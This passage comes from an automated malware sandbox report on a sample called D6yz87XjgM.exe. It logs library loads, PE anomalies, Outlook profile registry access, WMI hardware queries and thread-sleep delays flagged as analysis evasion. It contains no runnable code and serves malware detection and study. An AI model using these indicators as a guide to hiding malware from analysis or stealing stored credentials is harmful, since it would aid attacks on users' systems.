                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: vb6de.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: D6yz87XjgM.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: D6yz87XjgM.exeStatic file information: File size 1653512 > 1048576
                      Source: D6yz87XjgM.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x17d000
                      Source: D6yz87XjgM.exeStatic PE information: real checksum: 0x198c68 should be: 0x19997c
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_00408114 pushfd ; retf 0040h4_2_00408115
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0227032D push cs; ret 4_2_02270330
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02271419 push ss; retf 4_2_0227141A
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0227589A pushad ; retf 4_2_022758A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044277B pushad ; retf 8_2_00442788
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00442F01 push ebp; retf 8_2_00442F02
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EA0C6D push edi; retf 8_2_02EA0C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EA0C45 push ebx; retf 8_2_02EA0C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_06A1FAF3 push es; ret 8_2_06A1FAF4
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4EE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1939Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3540Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7916Thread sleep count: 109 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7916Thread sleep time: -109000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8004Thread sleep count: 1939 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8004Thread sleep count: 3540 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99734s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99625s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99501s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99375s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99265s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99153s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98934s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98827s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98716s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98606s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98483s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98375s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98265s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97937s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97828s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97719s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97609s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97390s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97280s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97172s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97062s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99501Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99153Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98934Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98827Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98716Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98606Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98483Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97500Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97390Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97280Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97172Jump to behavior
